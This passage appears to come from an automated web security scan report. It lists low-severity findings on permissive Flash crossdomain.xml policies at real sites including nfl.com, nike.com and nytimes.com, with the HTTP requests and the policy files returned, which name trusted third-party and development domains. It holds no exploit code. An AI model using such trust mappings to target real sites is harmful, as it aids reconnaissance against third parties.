Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsweek.com

Response

HTTP/1.1 200 OK
Age: 0
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:26:37 GMT
ETag: "132801d-1ce-49fb58d474dc0"
Last-Modified: Wed, 30 Mar 2011 16:20:15 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 2022418695
Content-Length: 462
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-in
...[SNIP]...
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...
7.364. http://www.nfl.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nfl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nfl.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: W/"3359-1301521068000"
Last-Modified: Wed, 30 Mar 2011 21:37:48 GMT
Content-Type: application/xml
Content-Length: 3359
Cache-Control: max-age=229
Expires: Sat, 02 Apr 2011 13:28:48 GMT
Date: Sat, 02 Apr 2011 13:24:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.nfl.com" />
   <allow-access-from domain="nfl.com" />
   <allow-access-from domain="*.gsislive.com" />
   <allow-access-from domain="*.superbowl.com" />
   <allow-access-from domain="superbowl.com" />
   <allow-access-from domain="clearspring.com" />
   <allow-access-from domain="*.clearspring.com" />
   <allow-access-from domain="*.2mdn.net" />
   <allow-access-from domain="66.192.35.242" />
   <allow-access-from domain="10.36.202.66" />
   <allow-access-from domain="192.150.10.200" />
   <allow-access-from domain="192.150.11.4" />
   <allow-access-from domain="192.150.8.7" />
   <allow-access-from domain="192.150.8.184" />
   <allow-access-from domain="192.150.4.10" />
   <allow-access-from domain="192.150.5.2" />
   <allow-access-from domain="192.150.5.150" />
   <allow-access-from domain="*.nfln.com" />
   <allow-access-from domain="*.nflnetworkaffiliates.com" />
   <allow-access-from domain="nfln.tierradev.com" />
   <allow-access-from domain="nfl.vmdataservices.com" />
   <allow-access-from domain="nfl2.vmdataservices.com" />
   <allow-access-from domain="smb.cdn.neulion.com" />
   <allow-access-from domain="nfl.cdnl3.neulion.net" />
   <allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.myspace.com"/>
   <allow-access-from domain="*.nfllabor.com"/>
   <allow-access-from domain="nfllabor.com"/>
   <allow-access-from domain="*.buffalobills.com"/>
   <allow-access-from domain="*.seahawks.com"/>
   <allow-access-from domain="*.panthers.com"/>
   <allow-access-from domain="*.chargers.com"/>
   <allow-access-from domain="*.bengals.com"/>
   <allow-access-from domain="*.titansonline.com"/>
   <allow-access-from domain="*.azcardinals.com"/>
   <allow-access-from domain="*.49ers.com"/>
   <allow-access-from domain="*.raiders.com"/>
   <allow-access-from domain="*.steelers.com"/>
   <allow-access-from domain="*.vikings.com"/>
   <allow-access-from domain="*.kcchiefs.com"/>
   <allow-access-from domain="*.detroitlions.com"/>
   <allow-access-from domain="*.miamidolphins.com"/>
   <allow-access-from domain="*.patriots.com"/>
   <allow-access-from domain="*.newyorkjets.com"/>
   <allow-access-from domain="*.baltimoreravens.com"/>
   <allow-access-from domain="*.clevelandbrowns.com"/>
   <allow-access-from domain="*.houstontexans.com"/>
   <allow-access-from domain="*.colts.com"/>
   <allow-access-from domain="*.jaguars.com"/>
   <allow-access-from domain="*.denverbroncos.com"/>
   <allow-access-from domain="*.dallascowboys.com"/>
   <allow-access-from domain="*.giants.com"/>
   <allow-access-from domain="*.philadelphiaeagles.com"/>
   <allow-access-from domain="*.redskins.com"/>
   <allow-access-from domain="*.chicagobears.com"/>
   <allow-access-from domain="*.packers.com"/>
   <allow-access-from domain="*.atlantafalcons.com"/>
   <allow-access-from domain="*.neworleanssaints.com"/>
   <allow-access-from domain="*.buccaneers.com"/>
   <allow-access-from domain="*.stlouisrams.com"/>
   <allow-access-from domain="yui.yahooapis.com"/>
   <allow-access-from domain="neulion.vo.llnwd.net"/>
   <allow-access-from domain="neulion.hs.llnwd.net"/>
   <allow-access-from domain="*.cdnl3.neulion.com"/>
   <allow-access-from domain="secure.footprint.net"/>
...[SNIP]...
7.365. http://www.nhl.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nhl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nhl.com

Response

HTTP/1.0 200 OK
ETag: "b6b86a-305-4957cdda67680"
Server: Apache
Last-Modified: Sat, 20 Nov 2010 14:30:34 GMT
Accept-Ranges: bytes
Content-Length: 773
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:19:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="nhl.com" />
<allow-access-from domain="*.nhl.com" />
<allow-access-from domain="nhl.cdn.neulion.net" />
<allow-access-from domain="smb.cdn.neulion.com" />
<allow-access-from domain="neulion.vo.llnwd.net" />
<allow-access-from domain="neulion.hs.llnwd.net" />
<allow-access-from domain="*.cdnl3.neulion.com" />
<allow-access-from domain="secure.footprint.net" />
<allow-access-from domain="localhost" />
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.hersheycanada.com"/>
<allow-access-from domain="*.draftfcbdigital.com"/>
...[SNIP]...
7.366. http://www.nike.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nike.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nike.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 08 Dec 2010 19:51:18 GMT
ETag: "112f-496eb71d35980"
Content-Type: application/xml
Cache-Control: max-age=10116
Expires: Sat, 02 Apr 2011 16:33:15 GMT
Date: Sat, 02 Apr 2011 13:44:39 GMT
Content-Length: 4399
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="nikeid.nike.com" secure="false" />
<allow-access-from domain="env1-brand.nike.com" secure="false"/>
<allow-access-from domain="env2-nikeid.nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nikewomen.nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nikeid-europe.nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.dyestat.com"/>
<allow-access-from domain="dyestat.com"/>
<allow-access-from domain="*.nikeacg.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nike.com.au" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nike.co.nz" secure="false" />
...[SNIP]...
<allow-access-from domain="*.niketown.nike.com" secure="false" />
...[SNIP]...
<allow-access-from domain="au.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="advision.webevents.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="nike.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nike.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="*.growingroster.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redcated" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="nikerunning.nike.com" secure="false" />
...[SNIP]...
<allow-access-from domain="nikeplus.nike.com" secure="false" />
...[SNIP]...
<allow-access-from domain="web.splashcast.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.immersivemedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.imc.cachefly.net" secure="false" />
...[SNIP]...
<allow-access-from domain="nike-dev2.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-dev3.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-dev4.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-dev5.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-dev6.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="gigyahosting1.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.gigya.s3.amazonaws.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="msnbanner.arcww.it" secure="false" />
...[SNIP]...
<allow-access-from domain="www.sportchalet.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="sportchalet.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.jdsports.co.uk"/>
<allow-access-from domain="cdn.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nv.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.beta01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nv.beta01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.beta01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.content01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nv.content01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.content01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.schuelervz.net"/>
<allow-access-from domain="*.studivz.net"/>
<allow-access-from domain="*.meinvz.net"/>
<allow-access-from domain="gigya.s3.amazonaws.com"/>
   <allow-access-from domain="gigyahosting1.com"/>
   <allow-access-from domain="admin.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="s101573.gridserver.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-prox-ecn18.ny.rga.com"/>
   <allow-access-from domain="nike-prox-ecn10.ny.rga.com"/>
   <allow-access-from domain="nikedev.blastradius.com" secure="false" />
...[SNIP]...
<allow-access-from domain="nike-qa.blastradius.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kobe.nike.jess3.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.facebook.com" secure="false"/>
...[SNIP]...
7.367. http://www.npr.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:59 GMT
Server: Apache/2.2.14 (Unix)
Last-Modified: Mon, 02 Nov 2009 20:35:41 GMT
Accept-Ranges: bytes
Content-Length: 355
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 13:53:59 GMT
Keep-Alive: timeout=10, max=4978
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.threespot.com"/>
   <allow-access-from domain="*.npr.org" />
   <allow-access-from domain="*.digitaria.com"/>
   <allow-access-from domain="www.kqed.org" />
...[SNIP]...
7.368. http://www.nwsource.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nwsource.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nwsource.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 May 2009 17:33:00 GMT
ETag: "3ee92-154-7c794b00"
Accept-Ranges: bytes
Content-Length: 340
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:34:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:34:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="local.ads.nwsource.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...
7.369. http://www.nypost.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nypost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 13 May 2010 18:51:22 GMT
ETag: "c38038-a4-4867e3ea75e80"
Accept-Ranges: bytes
Content-Length: 164
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:38:59 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.nypost.com" />
<allow-access-from domain="*.doubleclick.net" />
</cross-domain-policy>
7.370. http://www.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:43:14 GMT
Content-length: 1169
Content-type: text/xml
Set-cookie: RMID=3280aa5b17b64d9719e26d8a; expires=Sunday, 01-Apr-2012 12:43:14 GMT; path=/; domain=.nytimes.com
Last-modified: Wed, 21 Jul 2010 15:01:34 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...
7.371. http://www.opentable.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opentable.com

Response

HTTP/1.1 200 OK
Content-Length: 428
Content-Type: text/xml
Last-Modified: Tue, 15 Mar 2011 18:49:20 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Sat, 02 Apr 2011 13:45:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.eyewonder.com" />
<allow-access-from domain="eyewonder.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="eyewonderlabs.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...
7.372. http://www.opera.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.opera.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opera.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:17 GMT
Server: Apache
Last-Modified: Tue, 03 Aug 2010 10:18:41 GMT
ETag: "30002974-127-48ce8a4248240"
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 142
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*.opera.com" secure="true"/>
</cross-domain-policy>
7.373. http://www.opinionshere.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.opinionshere.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opinionshere.com

Response

HTTP/1.1 200 OK
Set-Cookie: opinions_here=a500242$50$0$6$140b0403$1021b38; Version=1; path=/; expires=Sun, 3-Apr-2011 2:27:56 GMT
Content-Type: text/xml
Last-Modified: Mon, 29 Nov 2010 15:24:56 GMT
Accept-Ranges: bytes
ETag: "dfbc2094d98fcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:01:35 GMT
Connection: close
Content-Length: 696

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.otxresearch.com" />
   
<allow-access-from domain="*.vo-id.com" />

<allow-access-from domain="*.surveymatch.com" />
   
<allow-access-from domain="*.rsxportal.com" />
...[SNIP]...
<allow-access-from domain="*.opinionshere.com" />
...[SNIP]...
7.374. http://www.oprah.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oprah.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oprah.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://www.oprah.com/w3c/p3p.xml", CP="CAO DSP ADM DEV PSD OUR IND NAV UNI"
Cteonnt-Length: 356
Content-Type: text/xml
Cache-Control: max-age=900
Date: Sat, 02 Apr 2011 13:35:56 GMT
Content-Length: 356
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.oprah.com
Set-Cookie: check_loc=US; expires=Sun, 03-Apr-2011 13:35:56 GMT; path=/

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.oprah.com" secure="false" />
   <allow-access-from domain="*.harpo.com" secure="false" />
<allow-http-request-headers-from dom
...[SNIP]...
7.375. http://www.oracle.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Last-Modified: Sun, 13 Mar 2011 22:39:04 GMT
ETag: "4e01a6-2f2-49e64dcbaf200"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=85111872234949666,0)
Date: Sat, 02 Apr 2011 13:40:06 GMT
Content-Length: 754
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com" />
<allow-access-from domain="oracle.com"/>
...[SNIP]...
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
...[SNIP]...
7.376. http://www.ourstage.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ourstage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ourstage.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: haproxy
Last-Modified: Fri, 03 Jul 2009 01:23:45 GMT
ETag: "10255-114-46dc301e9ea40"
Accept-Ranges: bytes
Content-Length: 276
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ourstage.com" />
   <site-con
...[SNIP]...
7.377. http://www.overstock.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.overstock.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:29 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT
Accept-Ranges: bytes
Content-Length: 230
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy
X-Pad: avoid browser bug

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-content-type"/>
<allow-access-from domain="*.overstock.com"/>
<allow-access-from domain="*.ostkcdn.com"/>
...[SNIP]...
7.378. http://www.pandora.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pandora.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pandora.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:06 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 22:14:31 GMT
ETag: "127-49fa66264bfc0"
Accept-Ranges: bytes
Content-Length: 295
Cache-Control: max-age=-224615
Expires: Wed, 30 Mar 2011 22:14:31 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=65
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.pandora.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mediapromoter.net" secure="false"/>
...[SNIP]...
7.379. http://www.parentsconnect.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.parentsconnect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.parentsconnect.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 30 Nov 2010 17:54:05 GMT
ETag: "4ad4016-1d7-49648dfe54940"
Accept-Ranges: bytes
Content-Length: 471
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:36:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
